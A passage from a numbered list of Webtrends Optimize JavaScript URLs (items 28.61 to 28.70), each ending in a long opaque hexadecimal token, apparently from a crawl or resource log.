82ab85c86753c598e32be61a40ad115bb28fcb4cd9fc46c23f1e4b9c1de4dc5267d19ca38906d6afa60b6c335ed48259fe13cb297adf517a2aced63bcbecada3ed3a960df96629a50e58ae4c0178e7faa122406abe04d14b39d016e8e31aa84f99e4056bf4a35df87926ba4dd1a21ffd079714c50820e47d59b96dd659972566a8b031da0bb35df2617b373c19c5b4dde4ce3d69ccf6b59e8f90f2daf9b6156f1bb0cb98c78d0b4013d2173f1dd657de090d2027d750c94eaba1b0f554b23b5f05b5697157327f95360a35612ea4ec297f9766254e3715123d07c3c51ecacef5e222e1577edc72b13c16462e6befedeb66510d1111be7d80eb92aa438a4b029d892513ab41961f5aaf75ffce04cba025fc8cef680e1b66e970a5ab467d6a0d739e976c1f1d8a6dcba5f531f390f0f45e8967f71504700f2f889714595c5206e8e7491a5ad7e78b470e10e6bcb41b8301b41916d59fbb90e135577f1fe619942105793ef90cb82ecc80fa98596434f90d984edad0e5bd92722b197e67b3dd1fc9400cb7ea8654a0caf6248f87bacf297959af756d6072084056728133a669b77bfb470469769929c57142930d428d71771d3ae20022915c185680ddc652f917d0a04aa3b486f8a8280dad7ba48ff12e8423635d8cab094b976b070de61e102984f643f4fdb6ad17c406685c8a45069b2596d3a392fdc3276be3e84c1bcfce2985a91d9122f2d85c3a3f2c4ab82b95f9f7d62dbd2a3b324d1367971b1c1d198290c0e13b3777d2cf1156886c40b883d47b346180747440a6ac8591f61c72c18126c0d7d523617b5682bd58b743da7996af1aa4f24f9711fffb97a38155f734a1c2c18adb19acdc17ee66be2cd9ca7136ed44b29c1ed843ae62e6e151e0e6354189bb7611e37d4dcaf9872fa7568551bb31337ddd8563f91a6500ac2e9d1af9accbc502a7f64a

28.61. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776af9271f153863f09fd35a5417533339979f0989b728624c6cedd54716cb6e1ba617a951d33a4a30b430f4179e5cc942e0a0291bad6794710fe13e27645e557c77a978a87c2f20bf59ecf1f4c762dbc40b3085ac049153d4f8171659d7b5a2b8888e52ab771d8adb43fba67f7b287b3df4ea08c5da199cf837c2ccb9daac685025cb0a64d432697beef82a18ac1c00095afd3833c4163d5a9e477b444360fd489d2990598cfeaeec6a2bfba18bd8d4408349e42ef75a0c87ec494e1e14ec0a114a93c7efd8996745c5daa47ca56d14e14700a382da169aba12d726052dd351fc8710319286a1890ad8aeb21f7f6556da8604f118927935dc10623da6ef7e8bb8aeb8b47a9140f06165a50946a84c0278ebf6a928193ff919c27253c654b7b70bf75ecba0487e9a981cbb256da940c2a052f803c04793087fec700df568ce5c8b3521f7ea24cc48f9489a703a78700bc1a791b6963e3996e2eb888fc8aed8afb71e3c4be3cec892800c114284176d45810cdf090d7421d152ca1aa0a5b4af57bb3b0d00e96a7004362a92300460627ff6b97f7ec266234f3247426f05939318c590f2e22be351728729e33e1b402960bbe0eb6705531f47eb2c84eb96af15dd1a02c88d7f44ff45911c0fa472fcd41adfcd65bbc3b437570e76bf2fe9a8467f3f0c3c8ec1061d4ff32b88aaba47aed4c5b909c96087615b660c6b8bcc1c5b085150e9b0191d5b81b68e170a13bfbdee4ed655bb411c88cce99ce5615f2f48b44a977c042a38af0cb9289b82ad9f0d3530f8549b4cdad4efb7c126390d6b09f5ca09c94c5ba5a8dc00ebcff92388dba4882b1151a7512e272d456d5d61b472a62be00dd84f153561c4729d7218945a118e20724c6cee5527c4081f5b8eda9a50f015dbfd4ef1b3d5f8af2c57ae2ea4ddaa2585203454dcad094e9c3c055bec1547268ef647f9fdb7fc1c96023c0781455493269482abc5f990246cb5bf5d54daa86794b447cd72f4910f653f7f41ff26d6f9a7d47be67f6832111831934d18491d809b90e27d7e33b1ac7f29ea1f01ba988c2b242e941c190ce5a2d284af0777de8226c2d3d8726a2a5181a15ae04ade7e99a217fea552c317abf491f9895caa30ebc3c18b8a4fa1d01ef47cb2428c927d04dd55a3dc4bc34cba6aeaea47a8b4610cdbbf7514b37d47c0f1823cee10ed39fb67723ca8eb1e8e680a00c953810ab6ab9482defc4896041225b9307faf61cafc1c4d65613d98476d83efe20978ea01a848e2

28.62. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2aced63bcbecaea3ed3a960df96636a50643ac4c077cfcf2ab2b4f69a511cb2c508b53b6b10fa75491fe117f85cd1bbd2369a14ecbab07e205840fd26e46a93102f57ec24a887e21ebe2728618ac4e9a233620715296e4dcf1a8572a81b9ec9ed08bfac9b1a2795108a59481d1821e170dd71d6f13800cd1520d206bd749c857ede7eaaf12f12b1244870c1f77575f813e1f6f603fbaf73501f56803

28.63. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2aced63bcbecaea3ed3a960df96636a50643ac4c077cfcf2ab2b4f69a511cb2c508b53b6b10fa75491fe117f85cd1bbd2369a14ecbab07e205840fd26e46a93102f57ec24a887e21ebe2728618ac4e9a233620715296e4dcf1a8572a81b9ec9ed08bfac9b1a2795108a59481d1821e170dd71d6f13800cd1520d206bd749c857ede7eaaf12f12b12448f2f341f726fc67610313d28f1b36a7284672840374015395796c7189e9ca4b67db75372df29e6681417736ebfe5ba3207581411e17dd0e092a847da1f059e8c7017f846964d5cfa26ffc752c9a523fedce0690a1930e725a0fc462c39007398946f184cd768caffa56da0c5a1fa0a8c33ff425425572c8fc343095d0056e9b41a1d0b81ba8a120915ede5ef488404e0191c8dcdb69eb66f0d7d1cb54fc2210a2b6eab51b378ce8efe9c0d3660f158911d8584ecbdc3736d516e0ef0ca50cf1c01f6aad100ee9eff758f87ae822e1251aa5625762a176b0c3deb26f07de003dc4d1165609d739e7940960d12892f7d4d3df41a33f7392629e9a88158e21f87e653e7dec1bab67d01f739e085a53186283353d6b5484bfb6f042aae564f67f3ab069ebcb0ed1db275371d8804009b7a9785aec6aa907369e4ec4b4ecbc62181a3139473a185596f6e7c1ee82cc2aff2d32cb37e3f38461430c44548181f829b96e5396a29d5cf195d886516e38add783733d57b251aa8a98393ad4374c6812696d1d3246e205fd7bc5ce04f8a2fc4fd1aa3a119c545fcf0c2f58806f334fcc0978cdb4daeda47f429aa17cbd86b6cb319e5814ad94fa96ff6b845b1b7681589ba7340bf704fcaf8872bf7568a04be232d6ceee90f8d7c1217f46dc71beeb48e8b9ffc57c2054722be6b77f36bc5b30f4f76103f9804639ff9a55932ae179bc1f2d6079c351ea5f4d99bdd77f780752e3a1b89d73931d54fb7291b05785c68

28.64. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2acefe3a91e2a0efa36ac84fe5603ea1084fb20b5110e3f2d96a0830e5669c6335d107f5b279d0038afc0b2c92c519ef216efd1295a053fb009010c10078e57c59f26cc1098a3427a3e6729e19a91c9920397c715895f495eb943b6a94e7ba8e8c91f3d8aab9143c44e49acbcb8f0d1740de4d3d1dd305dd52532473d4569c4aabf0b0f558e63a0955e43b24556129c6365831657bf4ec7d70c46323403441156c01c6954bc5cba7e57ee1537c8f29b73a414c7269e9e6ee3407591f11bb7ed6b1caff13d91f509eda221dad45c34c0cf87ffbc400c9a770aedeb26d5c4237b372f5fa4d2e390773cbc46b151f9077da91975687f3d5ef569b3ba201196669169b81480b495e40bdfb4e1f0887ba8d170815edaae64b8252b71916d4c1b987e4645e2e1eb94599210a363cae58b67e918ef4940e2967e2408a24bc93a9e3966733176d16f087009a0153f0a9de0db4c4f7298f9cbb9917791dea597e3224533f1b29f0189c6cf157c30b1c7165d221cf711693061ed02f72513cf8073fd519140cca99814ee22994b051a8eed2abb52957ac7babc8f33ed77262068caf0e18c1670659ee15107f88a247a9eaf9bf708443774ac143178f749fd3adcdedcf373fbfe24e1ccec47186fb18c122a48b5e6c3e7019e47f96a9a7882ee7796d3043123096441e1a1882cbc6e66e342485ce1258893910e3dc8478376682747748a0f88295f6117196d774ca84d0723b7b5284bb59b648db72c6ff4ea0a44b9411fbfac5a1d105f767f394918cd94efd8843ff78ab4b9c886d6cb141ef811e8014a168a5ef4ab1e669408ebb7110e57c48cbaa8226f001d45fbc232a6ebce008862c4040a73fc348bfb5848ec8ae07c2044027be317ef43accb61b5a6d762ed8133a92a5a64063f21795c1b1df419f6f1fa2a0d89d8e71ac8a262e3d4edad63b64db4fb7291b01cbfec7

28.65. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2acefe3a91f4bce4a535901afd613eb60454f94b522ae5a0f92f493ea819c172569003b3b509f70f9aa24b28c9cf18bd706efe47c3f107ad579e17c40820ea7d59a73ecc0eda6324f0e772cd4dac1acc2f3c2c715f94f6c6b2c43b6d93e0b9de8bcdf8dfa4b5163d49b4cecec1895d4011d61c3d1d8301890b0122218051c14dfda0b1fa50b53a5c57e46e2206617f97330e60312ff4b22c719037281a32451b6c03c6c349c599a4e47ae3017e8a76e43e41167a6fe9b7be30030f4013e12cd9e395ad1bdc1d009a8a2413fa43c24609a524fd930fc9a171fed4e5610d4234e974a0fd4e2c6c04779992691c4b8b62cdf3fa2bed81c19933ff0285010f665f2dccd90735341116e1b45d141b87ac89150a13e6b1e44b8456ac111cddceba90ec6f572f05b14f902e092134a551b7659984fd9b0d3e6ff8549e55d2c4f1acab1a7c41315ae693139b015aeda9d916bccefe268c87ae8370104ab216424f6b05635a27e865f23ba918e6765327398632c66210880e14d920714634ee0e278e5c575e979ed70fa30591e653e7dec1bab67d01f739e085a53186283353d6b5484bfb6f042aae564f67f3ab069ebcb0ed1db275371d8804039621c3d0fd96fec5706fb0ea1a49c19523d6a84f9321f3d900393f7d41e52995adf5d52fe17039304c456396481d1e49dace94e56a6027d2c0195ad86e47e588d47e3f37d227744aa3a98790ad4024c38176c6d2d2766f2a5081ba0ae048df7dc2f816f6a519c715ffa290f98202a531a1c6c28d8f4eaddf44fb79f8409c8b6763b513b3804dd447fe3ff1ba45e3b16244d2ef7115e3271dc0fc857ca002d000ef252a67b2e658db2c1312f56fc51abde481809fae009f051222bc3f75f269c9e10f4f76103f9804639ff9a55932ae179bc1f2d6079c351ea5f4d99bdd77f780752e3d4bd8856960db4fb7291b054e9cd9

28.66. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2acefe3a91f4bce4a535901afd613eb60454fa46097eb6f5ab7b1e3dae4bc72151c352b1b959ab0ecaf04a719d9e19bb246bab45c4aa04fd06c740950028ba700ca16ecf5bdc6371a3b275994dab489c273e2e7859c3f2c7b5936b6693e4bade889dfddfafe5153c44b79d9a958f0b401687173f45d4548d0b037026d003cd1cf9f6b4fe56bb3b0854e76b2109372bc26604356529febd2b70c466264c35471b3c05939012cf9bf7b829b7527a8821b13344122969eee3bb6654591012bb2984e190fe10d31600c8df2213f64cca180ba573aace50c9f477fad5ee390a1e61e926a0a8497e685673c3c1691948876ac8f7fa2bed81c19933ff0285010f665f2dccd90735341116e1b45d141b87ac89150a13e6b1e44b8456ac111cddceba90ec6f572f05b14f902e092134a551b7659984fd9b0d3e6ff8549e55d2c4f1acab1a7c41315ae693139b0154eda9d916bccefe268c87ae8370104ab216424f6b05635a27e865f23ba918e6765327398632c66210880e14d920714634ee0e278e5c575e979ed70fa30591e653e7dec1bab67d01f739e085a53186283353d6b5484bfb6f042aae564f67f3ab069ebcb0ed1db275371d8804009b7a9785aec6aa907369e4ec4b4ecbc62181a3139473a185596f6e7c1ee82cc2aff2d32cb37e3f38461430c44548181f829b96e5396a29d5cf195d886516e38add783733d57b251aa8a98393ad4374c6812696d1d3246e205fd7bc5ce04f8a2fc4fd1aa3a119c545fcf0c2f58806f334fcc0978cdb4daeda47f429aa17cbd86b6cb319e5814ad94fa96ff6b845b1b7681589ba7340bf704fcaf8872bf7568a04be232d6ceee90f8d7c1217f46dc71beeb48e8b9ffc57c2054722bd3073a43b9db30f4f76103f9804639ff9a55932ae179bc1f2d6079c351ea5f4d99bdd77f780752e381e8a826f61d24fb7291b020a4813

28.67. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d504097cbad24c4491d2a045edacbe7667b7643201395ddd85935675175c2e3597d81ec7f77c301528f0861619836210bd15e01494161f679046cd3ea440fb65c7801b6cdb15c0785ae23675645c05656ca824ea267721a956b4efe2a70bb4a76e10e7dd20fd29b3a81b5750cdf2a0cc8797498b0d77d29a74fbf96b7b6e3c60a8857ef6a272aa8452aec9d28be22b017eee772082045063f7e71611fc50474a14b96c5ab6704433fe2c1924450cbb12cc6dc90af1baf8eb7312f98881c095128342ff6ebd195c91f75d256f50ac52435d87d5eec6987458d691f829e41c42bb155bb08fcd5bd1f74fc32416419512e7cb5a6cd89db8810cdfa0a51c643857d59951e507d1400b9b073b6ab3b36c8eaffeb0f929970df96436a30b4fa6470879f0efba452729e84590365c8753a7ac1acd32ddb2443389c60abd3a6dab46c4a608f50c9e15de0037ed6b1ae3319b1bcb723ee78c35dc07ea0cc864222e705f96ffd2e9d56d66cce5eb8ad9c8ad8aafe3123b4ab7c9cfcad9054541d04d6612d704df5a022577d15ecc48aaf2e4a950b26f0b05e66a7702622fc0625c313579f3bd79799735204a6510146c52939f4ccd9df3e32fb15379db23b73344102a3eeae3eb3751524747b92984b3c5ad41dd4a57ce8e2316fd42cb4c09ae70fb970ecda573add4e4390d4333b37ba6fb487f3a5629cc933a1a4680689efff139f492a0fc588034a0410477017f8a91175c5f0703e9e61c1b0b8ebadb470b46e8bdee41d551bb144dd49fbbcfb06257204ab318c420597c3aab5de028ca8ead9c0c6361a45dc91dc1caffd1833127563356b0db5ec60255faaddf01a089ae4e888fd6cb384a11d05b6a436a147e0b449029e123a75f8010173061ce75992612c40813de24754e6cef0f27c55d400e8a8f9604f546d5f449a6b580f8fd265cac7ff7d2aa2f84703550ddfe041297690c59ec1f167d8dfc46fcf9b6a54c900e3f0f871e03907594d7fec7fc962263bfbe4c4fcbc37384fe4c9773a3d90f3d6c7a1ee82496fef6892ae07e3c37421263991e1d4f4f859c94e666602185c0195e8e6e40b68dd776316180742540a5fe8197a61073948b75c3d2d2743d215580b95fe6198878c5ae4afea01fc315fff1c0f08454a431f6ca93989158c79e52e227f317cb936862b716ee9313c310fb3fa7b844b4b7341bd9be7417b77d4ac8f0843cee10e532d1554f1ca8eb1ed62e045feb7103ee4dac

28.68. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d504097faad25255cec6b40eabb0a73969b9191a1b0b56e0819b7c5c17493824c1c009d8f47b361528f0865b488d231cbd11e21882470726c934d925a847ee70d6830875c82c9e230ae96c2766431d6937f93af6262220e119b3bee6ba16b4a63e47e58b7bf227bdaa0d4f48cae5d4a8899929800359cbb942ecfd786c6b3b7c9b9d6beab379bb9255c9a5fe8cf73e1c74d2403c82007f4ce8e7155fe448544219b56259b7734531e4331c25430aa00ccc6dc918ffb4a9f17c06cdab90d79e589b5aa968ba091b9ff920254551b55e00459fc6f1d9987458df9cfe29e0185fa41759b68dc15bd0f741db3b14439310ebcb5b6cd685a7830ed9a2a91c653859cd8642eb09ac40219a1e342aabab7f91b0feafe6288912fb6630a1074fa747066dfee1c7450d28f14bd12e449440a9a267cd18dcab536b91de19a2256fa940c6aa08f40c900dc11f28f2301bfa3f8b1a9b7c309aa436865cec1adf3b38207c5c99e4caf1913c3d90e3ecdddf98a9dfacb2403e48b0cfcec2dd5e1447844f3c1785048c585326758451981aa0a7b3f558b5310856b26c2652342a96300d63602ea2eb717b933a244d3612423905c2c01ecbcaf0e528b35e7e8e23b16f15417969bcb2bf3202081f10ec2980e6c7af44dd1657cedc7013fe43c01c0ea871aac1509ea625fc8be26a0a4260e975f1a61c7e680d77cf963c4f46836e9da7a76ff497f0ac58da30f7140127057bdd91435f52005abdb319170e85e189415914ebb2e640855ce1154ad5cdbccae46e5d201fb84c982e587a3cfb0cb02dcb85fc9c006330a15d9c59cfc482f9806b6a5a324cb6c65d87185bf6aed015f99c902088ffe7cb245f26f1434e647b013c7847bc65f93be003801845666699759a7343910b11db26751e34ef00749054185cdddec557f040d3f21cf1b780aba02c5bab28aa89fa29d022335789a0041993670759e713402e85f340fcabedfe4cca51690a8a405794719783a8c7acc22c63e3e8484bcc947484fc1fc724f48b593a392f4de57e95adfd827db32e6d3647403ac24b4f4e4cd79f92ee6d6272dec1115b883f15b788dc78653481207f4da0fd8295a01022c8d127c3d0d323612a5484bb5eb11ada2e95fe17f5f04dc341a8a794f48202a633f294d0969f25ef9d08a125f8168389666eb419f58b0b8715fc38a7ec41b4e06811d8bc7647b77c469cf99632e065e639c8435c7db0f355db685b5feb01ecb7cd

28.69. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242e360cd228b0a9f5ce36cd7ae3924cbeb05ca695832411d3ee0910c8eb07b1625753857e051e7336ac162ee32647ce02fc6488ccba1315aed893e219377b56013ce1b4b343950da3287741e91a387152a222a96b5e64c1fe804723d08c84ab85bbddab3e05aafc5b008e1b951e241f5a571874422724f41a76d8f7c8b4c7a09beb3b83ea42bbd001b8cf2ee001e56ade9c779fcc2d628d24594e1b7d1c51005929b853a591ce58c8d3cc335f0cf4d34caf4e452a5362ed22584f4e926cd6a310ae8a08882d174da594d01da3807ad7054f3ff3323bb15b96a8960c457ffb6dcf804cbe87f9fc2253380d08e93542b96517e511b5024aa3b75cd09538917af6b539c67155cac21e5eaadebfa5c165966f3e8d64be9cc11e428ada21d52b941f155f2c7fd5ae51c72d1b6b3fc444ba911dd0eb36d00226bba2f1f07043b7d373af140c3d72e4ce9144f477f144dbbe2aa0a5502146af4c2da51ea9c097ecf8bdcc40c98492ffab552a828d98a0001e5ea4bebef45674d82504d813ae8f15cb47e034cff9831fb8a133e7bdf048e0529a29fdffb5fc507e1dd3d8224f0e7535247816ab7e2f3128e700fdaf677311b3bc03c8657a9892b68b7c936edb741a0703e3af0eb8e2f7769510c8d5688d58f19841a0fb443c9a37f184cf67d2d5f865902b6e97f0c62d150dc223387a7b4dd74dc50ebc4d007b9aa2db30b1075522b07f21aa49a62d2fd02d7b633a85ff89adac9b6f154ca2ede7288f351de7ddeb9b3f16a355edb81c0585f70898ca895aa2e049338708cd59e1c09515a8f11349b5c7eb78c6bd0b3060afdda24afa1ff5891ccd145c58445ad5b0528b0cc517a5de32ad9e64448451e83742d05d3d1af419a181c0d0ce8a4bd4abf8fb42f71901fe35b33672819331528c438f8bf1eec29865a379a739e9a41a8949f42cf47e07fea1573dea5ef78b66d84e27628451c6ce1534c404e2db34066a99d16d913ec2824d076b25853482578dc692e7eb0cab571b23e85f3ba9659f21842675cfe1f8b03dfad10b2eb250fa534e03a7ffb9a0c64777719b2929360bd43585b5887b09064e7d77a84066bb4a72e4cee5b950cc10aa786ce7e8c4deeafdfa43d52fa5106c3529e2ba7d6f5ef2265a17b4ea2b3ec190f8f6f2e75877beba742ebd7c0895fa47a1f03e78ac239aa93b8895698c112c5114fa8eaa7257e13442abfaf3323cc0f05a5224b7eaa494e37fdcf062c28741867e111f466cdf056867b6349b074432844bffd0a13cefc01c33436c4c7af66460b02cf60df7e139f815a7fc29453e99f5d9a3d648a226df3e31e81910dd1950506b7a0df6a3d3c16c4fe58db28d496bacb65a09449235004d8490d51ba17347b8de5c9e3cd01d2f3e49aba552de700136f3f

28.70. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242e360cd228b0a9f5ce36cd7ae3924cbeb05ca695832411d3ee0910c8eb07b1625753857e051e7336ac162ee32647ce02fc6488ccba1315aed893e219377b56013ce1b4b343950da3287741e91a387152a222a96b5e64c1fe804723d08c84ab85bbddab3e05aafc5b008e1b951e241f5a571874422724f41a76d8f7c8b4c7a09beb3b83ea42bbd001b8cf2ee001e56ade9c779fcc2d628d24594e1b7d1c51005929b853a591ce58c8d3cc335f0cf4d34caf4e452a5362ed22584f4e926cd6a310ae8a08882d174da594d01da3807ad7054f3ff3323bb15b96a8960c457ffb6dcf804cbe87f9fc2253380d08e93542b96517e511b5024aa3b75cd09538917af6b539c67155cac21e5eaadebfa5c165966f3e8d64be9cc11e428ada21d52b941f155f2c7fd5ae51c72d1b6b3fc444ba911dd0eb36d00226bba2f1f07043b7d373af140c3d72e4ce9144f477f144dbbe2aa0a5502146af4c2da51ea9c097ecf8bdcc40c98492ffab552a828d98a0001e5ea4bebef45674d8250549d27fbe246b0270842ff9234ba8453226ac048925d62ae9ed1fc1bc215ad8c6bc117d7d7756872fb4785da9d30c46a0f86a17e684c65d73f9f46d4fc455f86a500cdc524c11f6833f2ee822f7e6d440f801681da9b1aa65d0ef464b4d43b582fa26e6d0e961744e2800c7c16ac21ab374598da85e052c149dbfeca05a8a805b308205e225f7a9766c3f667b8ba4180f674fa34a5dd9b97d9b10b9560d06ad9ab0e98038df8e4ae7e3b529ec7800e48729be3c7d0fc6f47c26b34cfbdca595b0840800073de1a35a49378b0d2607595a130bbb2a50d84d5ca23a2c907ee0b1423a5c8467254ea2dcfe255575072f2306a5986c6ac5a930e190d0cebbbbb4cb781b92e7e8616e64828704e7f7e59738